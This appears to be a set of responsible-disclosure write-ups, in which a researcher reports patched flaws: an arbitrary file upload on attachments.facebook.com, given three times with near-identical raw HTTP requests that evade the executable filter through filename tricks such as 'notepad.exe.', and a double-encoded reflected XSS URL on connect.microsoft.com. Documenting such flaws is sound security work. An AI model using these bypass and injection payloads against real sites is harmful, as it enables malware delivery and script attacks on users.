Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.
Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068
Accept-Encoding: gzip, deflate
Host: attachments.facebook.com
Content-Length: 194182
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="post_form_id"
[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="fb_dtsg"
[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="id"
[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="attachment"; filename="..exe"
Content-Type: application/octet-stream
Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.
Facebook White Hat
https://www.facebook.com/whitehat
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.
Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200
-----------------------------265001916915724
Content-Disposition: form-data; name="post_form_id"
[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="fb_dtsg"
[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="id"
[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream
Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.
Facebook White Hat
https://www.facebook.com/whitehat
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.
Proof of concept
Tested in IE9 with XSS filter enabled
============================
http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E
Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.
Microsoft White Hat
http://technet.microsoft.com/en-us/security/cc308575
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.
Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 194188
-----------------------------4827543632391
Content-Disposition: form-data; name="post_form_id"
[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="fb_dtsg"
[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="id"
[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"
Content-Type: application/octet-stream
Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.
Facebook White Hat
https://www.facebook.com/whitehat